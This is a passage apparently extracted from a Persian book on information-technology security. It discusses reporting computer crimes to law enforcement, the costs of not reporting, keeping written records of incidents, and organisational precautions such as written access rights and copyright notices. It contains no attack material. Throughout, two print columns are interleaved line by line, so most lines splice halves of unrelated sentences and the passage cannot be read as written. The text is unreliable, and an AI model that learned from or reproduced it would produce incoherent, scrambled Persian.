ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻭ ﮔﺴﺘﺮﺵ ﺍﺳﺖ ﻭ ﻟﺬﺍ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺑﺪﺭﺳﺘﻲ ﺁﻧـﺮﺍ ﺁﺯﻣﺎﻳﺶ ﺍﺳﺖ ،ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ.
ﻣﺪﻳﺮﻳﺖ ﻧﻜﻨﻴﺪ ﺑﺎﻋﺚ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺁﺳﻴﺒﻬﺎﻱ ﻓﺮﺍﻭﺍﻧـﻲ ﺑـﻪ ﺷـﻤﺎ ﻭ ﻭﻗﺘﻲ ﺑﺎ ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ ﻫﻤﻜـﺎﺭﻱ
ﺩﻳﮕﺮﺍﻥ ﺷﻮﺩ. ﻣــﻲﻛﻨﻴــﺪ ،ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺩﺭ ﺍﺛــﺮ ﺳــﻨﮕﻴﻨﻲ ﻭ ﻧﺎﻛﺎﺭﺁﻣــﺪﻱ ﺁﻥ
ﻣﺎ ﻋﻼﻗﻪﻣﻨﺪﻳﻢ ﻛﻪ ﺧﻮﺷﺒﻴﻨﺎﻧﻪ ﺑـﻪ ﺍﻳـﻦ ﻣﻮﺿـﻮﻉ ﻧﮕـﺎﻩ ﻛﻨـﻴﻢ. ﺗﺤﻘﻴﻘﺎﺕ ،ﺩﻳﺪ ﺟﺎﻣﻌﺔ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧـﺴﺒﺖ ﺑـﻪ ﺷـﻤﺎ ﻣﻨﻔـﻲ ﺷـﻮﺩ.
ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﺑﻄﻮﺭ ﻛﻠـﻲ ﺍﺯ ﻧﻴـﺎﺯ ﺑـﻪ ﺍﺭﺗﻘـﺎﻱ ﺳـﻄﺢ ﺧـﻮﺩ ﺩﺭ ﺑﻴﺸﺘﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍﻳﺎﻧﻪ ﺩﻳﺪﮔﺎﻫﻲ ﻣﻨﻔﻲ ﻧﺴﺒﺖ ﺑﻪ ﻣﺠﺮﻳﺎﻥ ﻗـﺎﻧﻮﻥ
ﻻ ﺩﺭ ﺗﻼﺷـﻨﺪ ﻛـﻪ ﺑﺮﺭﺳﻲ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻃﻼﻉ ﺩﺍﺭﻧﺪ ﻭ ﻣﻌﻤﻮ ﹰ ﺩﺍﺭﻧﺪ ﻭ ﺍﮔﺮ ﺷﻤﺎ ﻫﻢ ﺩﺭ ﺁﻥ ﺟﺎﻳﮕﺎﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ ،ﺍﻳﻦ ﺍﺣﺴﺎﺳﺎﺕ
ﻣﺮﺍﻛﺰ ﺁﻣﻮﺯﺷﻲ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻨﺪ ،ﺗﺸﻜﻴﻼﺕ ﻭ ﺗﺴﻬﻴﻼﺕ ﺗﺤﻠﻴـﻞ ﻣﺘﻮﺟﻪ ﺷﻤﺎ ﻧﻴﺰ ﻣﻲﺷﻮﺩ .ﭼﻨﻴﻦ ﻗـﻀﺎﻭﺗﻬﺎﻳﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﺟﺎﻳﮕـﺎﻩ
ﻗﺎﻧﻮﻧﻲ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻨﺪ ،ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﻳﮕﺮﻱ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ ﺷﻤﺎ ﺭﺍ ﺩﺭ ﺍﻧﻈﺎﺭ ﭘﺎﻳﻴﻨﺘﺮ ﺍﺯ ﺁﻧﭽﻪ ﻛﻪ ﻣـﺴﺘﺤﻖ ﺁﻥ ﻫـﺴﺘﻴﺪ ﻗـﺮﺍﺭ
ﻻ ﺩﺭ ﺩﺍﺩﺳﺮﺍﻫﺎ )ﺧﺼﻮﺻﹰﺎ ﺩﺭ ﻣﻨﺎﻃﻖ ﺛﻤﺮﺑﺨﺶ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻧﺪ .ﻣﻌﻤﻮ ﹰ ﺩﻫﺪ ﻭ ﺍﺯ ﻫﻤﻜﺎﺭﻱ ﺷﻤﺎ ﻧﻪ ﺗﻨﻬﺎ ﺑﺎ ﺁﻥ ﺗﺤﻘﻴﻘﺎﺕ ﺑﻠﻜـﻪ ﺑـﺎ ﺳـﺎﻳﺮ
ﭘﻴﺸﺮﻓﺘﺔ ﻛﺸﻮﺭ( ﺑﻌﻀﻲ ﺑﺎﺯﺭﺳﺎﻥ ﻭ ﺩﺍﺩﻳﺎﺭﻫﺎ ﺗﺠﺮﺑﺔ ﺯﻳـﺎﺩﻱ ﻛـﺴﺐ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺗﺨﺼﺼﻲ ﻧﻴﺰ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳـﻦ ﭘـﺲ ﺍﺯ
ﻣﻲﻛﻨﻨﺪ ﻭ ﻟﺬﺍ ﺑﺎﻳﺪ ﺩﺭ ﺗﻼﺵ ﺑﺎﺷﻨﺪ ﻛـﻪ ﺍﻃﻼﻋـﺎﺕ ﺧـﻮﺩ ﺭﺍ ﺑـﻪ ﭘﺎﻳﺎﻥﻳﺎﻓﺘﻦ ﺑﺎﺯﺭﺳﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻣﺎﺝ ﺣﻤﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻳـﺎ
ﺳﺎﻳﺮ ﻫﻤﻜﺎﺭﺍﻧﺸﺎﻥ ﻧﻴـﺰ ﺍﻧﺘﻘـﺎﻝ ﺩﻫﻨـﺪ .ﻧﺘﻴﺠـﺔ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪ ﺩﺭ ﺳﺎﻳﺮ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﻫﺎ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ.
ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﻳﻚ ﺍﺭﺗﻘﺎﻱ ﺍﺳﺎﺳﻲ ﺩﺭ ﺳـﻄﺢ ﻣﻮﻓﻘﻴـﺖ ﻓﻌﺎﻟﻴـﺖ ﺍﻳﻦ ﺭﻓﺘﺎﺭﻫﺎ ﻣﺎﻳـﺔ ﺗﺄﺳـﻔﻨﺪ ،ﭼﺮﺍﻛـﻪ ﺑـﻪ ﻫـﺮ ﺣـﺎﻝ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﻭ ﺍﻧﺠـﺎﻡ ﺷـﺪﻥ ﺗﻌـﺪﺍﺩ ﺯﻳـﺎﺩﻱ ﺗﺤﻘﻴﻘـﺎﺕ ﻭ ﺑﺎﺯﺭﺳــﺎﻥ ،ﺩﻗﻴــﻖ ﻭ ﺣﺮﻓــﻪﺍﻱ ﻫــﺴﺘﻨﺪ ﻭ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺑــﺮﺍﻱ
ﺩﺍﺩﺭﺳﻴﻬﺎﻱ ﻣﻮﻓﻖ ﺩﺭ ﺣﻮﺯﺓ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﺑﻮﺩﻩ ﺍﺳﺖ .ﺑﻬﺘﺮ ﺍﺳﺖ
ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻳﻚ ﻓﻌﺎﻟﻴﺖ ﻣﺸﻜﻮﻙ ﻳﺎ ﺗﻬﺎﺟﻢ ﺩﺍﺋﻤﻲ ،ﻭﺍﻗﻌـﹰﺎ ﺑـﻪ
ﺑﻪ ﻓﻮﺍﻳﺪ ﺑﻴﺸﻤﺎﺭ ﮔﺰﺍﺭﺵﻛﺮﺩﻥ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ -ﻧﻪ ﺗﻨﻬﺎ ﺑـﺮﺍﻱ
ﺑﺎﺯﺭﺳﻴﻬﺎﻱ ﻣﻮﺷﻜﺎﻓﺎﻧﻪ ﻧﻴـﺎﺯ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ .ﺍﻣـﺮﻭﺯ ﻣـﻲﺗـﻮﺍﻧﻴﻢ
ﺧﻮﺩﺗــﺎﻥ ،ﺑﻠﻜــﻪ ﺑــﺮﺍﻱ ﺗﻤــﺎﻡ ﺟﺎﻣﻌــﻪ -ﺗﻮﺟــﻪ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻴﺪ:
ﺑﮕﻮﻳﻴﻢ ﻛﻪ ﺍﻳﻦ ﻣﺸﻜﻞ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﻛﻤﺘﺮ ﺷﺪﻩ ﻭ ﻧﮕﺮﺍﻧﻴﻬـﺎ
ﺩﺍﺩﺭﺳــﻴﻬﺎﻱ ﻣﻮﻓــﻖ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﺑﺎﻋــﺚ ﺟﻠــﻮﮔﻴﺮﻱ ﺍﺯ ﺳــﻮﺀ
ﺩﺭ ﻣﻮﺭﺩ ﺁﻥ ﻧﺴﺒﺖ ﺑﻪ ﺩﻫﺔ ﮔﺬﺷﺘﻪ ﻛﺎﻫﺶ ﻳﺎﻓﺘﻪ ﺍﺳﺖ .ﺑﻪ ﻣﺮﻭﺭ
ﺍﺳﺘﻔﺎﺩﻩﻫﺎﻱ ﺑﻌﺪﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻤﺎ ﻭ ﻧﻴﺰ ﺩﻳﮕﺮﺍﻥ ﺷﻮﻧﺪ. ﺯﻣﺎﻥ ﻭ ﺑﺎ ﺁﮔﺎﻫﺘﺮ ﺷﺪﻥ ﻣﺮﺩﻡ ﻧﺴﺒﺖ ﺑﻪ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ -
ﺣﺘﻲ ﺁﻧﻬﺎ ﻛﻪ ﺳﻮﺀ ﻧﻴﺘﻲ ﻧﺪﺍﺷﺘﻪﺍﻧﺪ -ﺍﻧﺘﻈﺎﺭ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﺍﻳـﻦ
ﻣﺴﺌﻮﻟﻴﺖ ﮔﺰﺍﺭﺵ ﺟﺮﻡ
ﺍﺣﺴﺎﺳﺎﺕ ﻣﻨﻔﻲ ﻧﺴﺒﺖ ﺑﻪ ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﺍﺯ ﺍﻳﻦ ﻫـﻢ ﻛﻤﺮﻧﮕﺘـﺮ
ﺩﺭ ﭘﺎﻳﺎﻥ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻳﻚ ﺟﺮﻡ ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺗﻲ ﻣﻮﺭﺩ ﺷﻮﺩ.
ﭘﻴﮕﺮﺩ ﻗﻀﺎﻳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ﻛﻪ ﺷﻤﺎ ﺁﻧﺮﺍ ﮔﺰﺍﺭﺵ ﻛـﺮﺩﻩ ﺑﺎﺷـﻴﺪ.
ﺗﻮﺻﻴﺔ ﺍﻛﻴﺪ ﻣﺎ ﺑﻪ ﺷﻤﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫﻨﮕﺎﻡ ﺗـﺼﻤﻴﻢﮔﻴـﺮﻱ ﺩﺭ
ﺩﺭ ﻏﻴﺮﺍﻳﻨﺼﻮﺭﺕ ﺍﻳﻨﻜﺎﺭ ﺍﻧﺠﺎﻡ ﻧﻤـﻲﺷـﻮﺩ ﻭ ﺍﻳـﻦ ﻧـﻪ ﺑـﻪ ﺳـﻮﺩ
ﻲ ﺳﻴﺴﺘﻢ ﺧـﻮﺩ ﺑـﺎ ﻣﻮﺭﺩ ﺩﺭﻣﻴﺎﻥ ﮔﺬﺍﺷﺘﻦ ﻫﺮﮔﻮﻧﻪ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘ ﹺ
ﺷﻤﺎﺳﺖ ﻭ ﻧﻪ ﻫﻴﭽﻜﺲ ﺩﻳﮕﺮ؛ ﻭ ﺩﺳﺖ ﻧﻔﻮﺫﮔﺮ ﺭﺍ ﻧﻴﺰ ﺑﺮﺍﻱ ﻭﺍﺭﺩ
ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﺧﻮﺏ ﻓﻜﺮ ﻛﻨﻴﺪ ﻭ ﺟﻮﺍﻧﺐ ﺍﻣـﺮ ﺭﺍ ﻣـﻮﺭﺩ ﺑﺮﺭﺳـﻲ
ﺁﻭﺭﺩﻥ ﺁﺳﻴﺒﻬﺎﻱ ﺑﻴﺸﺘﺮ ﻭ ﺑﻪ ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮ ﺑﺎﺯ ﻣﻲﮔـﺬﺍﺭﺩ .ﺑـﻪ ﻳـﺎﺩ
ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﻗﻊ ﺑﻬﺘـﺮ ﺍﺳـﺖ ﺑـﺴﻨﺠﻴﺪ ﻛـﻪ ﺩﺭ ﭼـﻪ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﻧﭽﻪ ﺷﻤﺎ ﺑﺎ ﺁﻥ ﺑﺮﺧﻮﺭﺩ ﻛﺮﺩﻩﺍﻳـﺪ
ﺻﻮﺭﺕ ﻣﺮﺍﺟﻌﻪ ﺑﻪ ﻣﺮﺍﺟﻊ ﻗﻀﺎﻳﻲ ﻻﺯﻡ ﺍﺳﺖ :ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻭﺍﻗﻌﹰﺎ
ﺟﺰﺋــﻲ ﺍﺯ ﻳــﻚ ﻣﺠﻤﻮﻋــﺔ ﻋﻈــﻴﻢ ﺟــﺮﺍﺋﻢ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ ﺍﻋﻤــﺎﻝ
ﭼﻴــﺰﻱ ﺭﺍ ﺍﺯ ﺩﺳــﺖ ﺩﺍﺩﻩ ﻭ ﻣﺘﺤﻤــﻞ ﺿــﺮﺭ ﺷــﺪﻩﺍﻳــﺪ ﻭ ﻳــﺎ
ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ ﺑﺎﺷﺪ .ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳﻴﻬﺎﻱ ﻻﺯﻡ ﻧﻤـﻲﺗـﻮﺍﻥ ﺍﺩﻋـﺎ
ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺷﺨﺼﹰﺎ ﻗﺎﺩﺭ ﺑﻪ ﻛﻨﺘﺮﻝ ﻭﺿﻌﻴﺖ ﭘﻴﺶﺁﻣﺪﻩ ﻧﻴـﺴﺘﻴﺪ.
ﻛﺮﺩ ﻛﻪ ﺁﻧﭽﻪ ﺑﺮ ﺳﺮ ﺷﻤﺎ ﺁﻣﺪﻩ ﻳﻚ ﺭﺧﺪﺍﺩ ﻣﺠﺰﺍ ﻭ ﺑﻲﺍﺭﺗﺒﺎﻁ ﺑـﺎ
ﺑﻌﻀﻲ ﺍﻭﻗﺎﺕ ﻫﻴﺎﻫﻮﻱ ﻧﺎﺷﻲ ﺍﺯ ﻳﻚ ﺍﺗﻔﺎﻕ ﺧﻄﺮﻧـﺎﻛﺘﺮ ﺍﺯ ﺳـﺎﻳﺮ
ﺳﺎﻳﺮ ﺍﺟﺰﺍﻱ ﺳﻴﺴﺘﻢ ﺑﻮﺩﻩ ﻭ ﻳﺎ ﺟﺰﺋﻲ ﺍﺯ ﻳﻚ ﺗﻬﺎﺟﻢ ﺑﺰﺭﮔﺘﺮ.
ﺧﺴﺎﺭﺗﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﭘﻲ ﻭﻗﻮﻉ ﺁﻥ ﺍﺗﻔﺎﻕ ﺑﻪ ﺑﺎﺭ ﻣﻲﺁﻳﺪ.
ﻞ ﺩﻳﮕ ﹺﺮ ﻋﺪﻡ ﮔﺰﺍﺭﺵ ﺟﺮﺍﺋﻢ ﺳﻨﮕﻴﻦ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻳـﻦ ﺍﺳـﺖ ﻣﺸﻜ ﹺ
ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜﻪ ﺗﺼﻤﻴﻢ ﺑﻪ ﺍﺳﺘﻤﺪﺍﺩ ﺍﺯ ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﮔﺮﻓﺘﻴﺪ ﺍﺯ ﺑﻪﭘﺎ
ﻛﻪ ﺑﺮﺧﻲ ﺑﻪ ﻏﻠﻂ ﺗﺼﻮﺭ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ ﻛﻪ ﺍﻳﻦ ﺟﺮﺍﺋﻢ ﺑﻨﺪﺭﺕ ﺭﺥ
ﻛﺮﺩﻥ ﻫﻴﺎﻫﻮ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺑﭙﺮﻫﻴﺰﻳﺪ .ﺩﺭ ﺑﻌﻀﻲ ﻣـﻮﺍﺭﺩ ﺩﺧﺎﻟـﺖ
ﻣــﻲﺩﻫﻨــﺪ ﻭ ﺩﺭﻧﺘﻴﺠــﻪ ﺍﺣﺘﻤــﺎﻝ ﻭﻗــﻮﻉ ﺍﻳــﻦ ﻣــﺸﻜﻼﺕ ﺩﺭ
ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﻣﻲ ﺗﻮﺍﻧﺪ ﻋﺎﻣﻞ ﺩﻟﺴﺮﺩﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﺎﺷﺪ ،ﺍﻣـﺎ ﺩﺭ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﻧﺎﭼﻴﺰ ﺧﻮﺍﻫﻨﺪ ﭘﻨﺪﺍﺷﺖ ،ﺭﻭﻱ ﺑﻮﺩﺟﻪﺑﻨﺪﻱ ﻭ
ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ﻧﻴـﺰ ﻣـﻲﺗﻮﺍﻧـﺪ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﻛـﺎﻧﻮﻥ ﺗﻮﺟـﻪ ﺁﻧﻬـﺎ ﻭ
ﺁﻣﻮﺯﺵ ﻣﺄﻣﻮﺭﺍﻥ ﺟﺪﻳﺪ ﺍﺟﺮﺍﻳﻲ ﺗﺄﻛﻴﺪ ﺯﻳﺎﺩﻱ ﺑﻌﻤﻞ ﻧﺨﻮﺍﻫﺪ ﺁﻣﺪ؛
ﺩﺭﻧﺘﻴﺠﻪ ﺣﻤﻼﺕ ﺑﻴﺸﺘﺮ ﻗﺮﺍﺭ ﺩﻫﺪ .ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ
١٨٣ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻧﺴﺨﺔ ﭼﺎﭘﻲ ﺗﻬﻴﻪ ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺿﻤﻴﻤﺔ ﻳﺎﺩﺩﺍﺷﺘﻬﺎﻳﺘﺎﻥ ﻛﻨﻴﺪ. ﺑﺮﺍﻱ ﺑﻬﺒﻮﺩ ﻗﻮﺍﻧﻴﻦ ﻓﻌﻠﻲ ﺗﻼﺵ ﻧﺎﭼﻴﺰﻱ ﺧﻮﺍﻫﺪ ﺷـﺪ؛ ﻭ ﺟﺎﻣﻌـﻪ
ﻫﻨﮕﺎﻡ ﺍﻧﺠﺎﻡ ﺑﺎﺯﺭﺳﻴﻬﺎ ﻭ ﺗﺤﻘﻴﻘﺎﺕ ،ﻭﺟـﻮﺩ ﻳـﻚ ﺳـﺎﺑﻘﺔ ﻧﻴﺰ ﺑﻪ ﻣﻮﺿﻮﻋﺎﺗﻲ ﺍﺯ ﺍﻳﻦ ﻗﺒﻴﻞ ﺗﻮﺟﻪ ﻛﻤﺘﺮﻱ ﻧﺸﺎﻥ ﺧﻮﺍﻫﺪ ﺩﺍﺩ؛
ﻛﺘﺒﻲ ﺍﺯ ﺍﺗﻔﺎﻗﺎﺗﻲ ﻛﻪ ﺭﺥ ﺩﺍﺩﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﺴﻴﺎﺭ ﺍﺭﺯﺷـﻤﻨﺪ ﻭ ﺧﻼﺻﻪ ﺍﻳﻨﻜﻪ ﻧﺘﻴﺠﻪ ﺍﻳﻦ ﺧﻮﺍﻫﺪ ﺑـﻮﺩ ﻛـﻪ ﻣﺤـﻴﻂ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﺑﺎﺷﺪ .ﺯﻣﺎﻥ ﻭ ﻣﻮﺿﻮﻉ ﻛﻠﻴﺔ ﺗﻤﺎﺳﻬﺎ ﺑﺎ ﻣﺮﺍﺟﻊ ﻗـﺎﻧﻮﻧﻲ ﺭﺍ ﺑﺮﺍﻱ ﻫﻤﺔ ﺑﺎﺯﻳﮕﺮﺍﻥ ﺁﻥ ﺧﻄﺮﻧﺎﻛﺘﺮ ﺍﺯ ﺁﻧﭽﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑﻨﻈـﺮ
ﻧﻴﺰ ﺑﻪ ﺛﺒﺖ ﺑﺮﺳﺎﻧﻴﺪ. ﺑﻴﺎﻳﺪ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﺳﻌﻲ ﻛﻨﻴﺪ ﺳﻄﻮﺡ ﺍﺧﺘﻴﺎﺭﺍﺕ ﻛﻠﻴﺔ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ •
ﺍﺣﺘﻴﺎﻁ ﺑﻴﺸﺘﺮ...
ﺑﺼﻮﺭﺕ ﻛﺘﺒﻲ ﺗﻌﺮﻳﻒ ﻛﻨﻴﺪ ﻭ ﻫﺮﺁﻧﭽﻪ ﻛـﻪ ﻓـﺮﺩ ﺑـﻪ ﺁﻥ
ﺩﺳﺘﺮﺳﻲ ﻗﺎﻧﻮﻧﻲ ﺩﺍﺭﺩ )ﻭ ﻧﻴﺰ ﻫﺮﭼﻪ ﻛﻪ ﺑﻪ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﻧﺪﺍﺭﺩ( ﺩﺭ ﺍﻳﻦ ﺑﺨﺶ ﺧﻼﺻﻪﺍﻱ ﺍﺯ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ
ﺭﺍ ﺩﺭ ﺍﻳﻦ ﺗﻌﺎﺭﻳﻒ ﺑﻴﺎﻭﺭﻳﺪ .ﺑﺮﺍﻱ ﺍﺑﻼﻍ ﺍﻳـﻦ ﺗﻌـﺎﺭﻳﻒ ﺑـﻪ ﺍﺯ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﺍﺣﺘﻤﺎﻟﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ:
ﺍﻓﺮﺍﺩ ﺳﺎﺯ ﻭ ﻛﺎﺭﻱ ﺑﻴﺎﻧﺪﻳﺸﻴﺪ ﻛﻪ ﻫﺮ ﻛﺲ ﺑﺘﻮﺍﻧﺪ ﺑﺨـﻮﺑﻲ ﺩﺭ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪ ،ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ •
ﺁﻧﺮﺍ ﺑﻔﻬﻤﺪ ﻭ ﺑﻪ ﻛﺎﺭ ﺑﺒﻨـﺪﺩ ،ﻭ ﻣﺤـﺪﻭﺩﻳﺘﻬﺎﻱ ﺣﺎﺻـﻞ ﺍﺯ ﺣﻖ ﻧـﺴﺨﻪ ﺑـﺮﺩﺍﺭﻱ ﻭ ﻣﺎﻟﻜﻴـﺖ ﺍﻧﺤـﺼﺎﺭﻱ ﺧـﻮﺩ ﺭﺍ ﺩﺭ
ﺁﻧﺮﺍ ﻧﻴﺰ ﺩﺭﻙ ﻛﻨﺪ. ﺍﺑﺘﺪﺍﻳﻲﺗﺮﻳﻦ ﺑﺨﺶ ﻫﺮﻳﻚ ﺍﺯ ﻓﺎﻳﻠﻬـﺎ ﻗـﺮﺍﺭ ﺩﻫﻴـﺪ .ﺍﮔـﺮ
ﺑﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺧﻮﺩ ﺻﺮﺍﺣﺘﹰﺎ ﮔﻮﺷﺰﺩ ﻛﻨﻴﺪ ﻛﻪ ﻣﻠﺰﻡ ﻫﺴﺘﻨﺪ • ﺻﺮﺍﺣﺘﹰﺎ ﺑﻪ ﺣﻖ ﻧﺴﺨﻪﺑـﺮﺩﺍﺭﻱ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩﻩﺍﻳـﺪ ،ﺣﺘﻤـﹰﺎ
ﺑﺨﺶ ﺳﻮﻡ
ﺩﺭ ﭘﺎﻳﺎﻥ ﻛﺎﺭﺷﺎﻥ ﻭ ﻳﺎ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺧﻮﺍﺳﺘﻪ ﺷـﺪ ﺍﻣﻜﺎﻥ ﭘﺮﻛﺮﺩﻥ ﻳﻚ ﻓﺮﻡ ﻣﺨﺼﻮﺹ ﺩﺭ ﻫﻤﻴﻦ ﺭﺍﺑﻄـﻪ ﺭﺍ
ﻛﻠﻴﺔ ﻣﻨﺎﺑﻌﻲ ﻛﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭﺷﺎﻥ ﺑﻮﺩﻩ )ﻣﺜﻞ ﻣﺘﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻭ ﺑﺮﺍﻱ ﻫﺮ ﻣﺸﺘﺮﻱ ﭘﻴﺶﺑﻴﻨﻲ ﻛﻨﻴﺪ .ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﺪ
ﻛﺘﺎﺑﭽﻪﻫﺎﻱ ﺭﺍﻫﻨﻤﺎ( ﺭﺍ ﺑﺎﺯﮔﺮﺩﺍﻧﻨﺪ. ﺑﻪ ﺑﺎﺯﺭﺳﻲ ﺩﻗﻴﻖﺗﺮ ﻭ ﺗﺮﻣﻴﻢ ﺧﺴﺎﺭﺗﻬﺎ ﻛﻤﻚ ﻛﻨﺪ.
ﺍﮔﺮ ﺍﺗﻔـﺎﻗﻲ ﺭﺥ ﺩﺍﺩﻩ ﻛـﻪ ﺑﻨﻈـﺮ ﺷـﻤﺎ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ • ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻـﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ﺩﺭﺑـﺎﺭﺓ ﺑﺎﻳـﺪﻫﺎ ﻭ •
ﭘﻠﻴــﺴﻲ ﺭﺍ ﻻﺯﻡ ﻣــﻲﻛﻨــﺪ ،ﺍﺟــﺎﺯﻩ ﻧﺪﻫﻴــﺪ ﻛﺎﺭﻛﻨــﺎﻥ ﺑــﻪ ﻧﺒﺎﻳﺪﻫﺎﻱ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺧﻮﺩ ﺁﮔﺎﻫﻲ ﻛﺎﻣﻞ ﺩﺍﺭﻧﺪ.
ﺗﺤﻘﻴﻘــﺎﺕ ﺧﻮﺩﺳــﺮﺍﻧﻪ ﺑﭙﺮﺩﺍﺯﻧــﺪ .ﺗﻼﺷــﻬﺎﻱ ﺧﻮﺩﺳــﺮﺍﻧﻪ ﺗﻤﺎﻡ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺍﺯ ﻫﺮ ﭼﻴﺰﻱ ﻛﻪ ﺩﺭ ﺷﺒﻜﺔ ﺷـﻤﺎ ﺗﺤـﺖ •
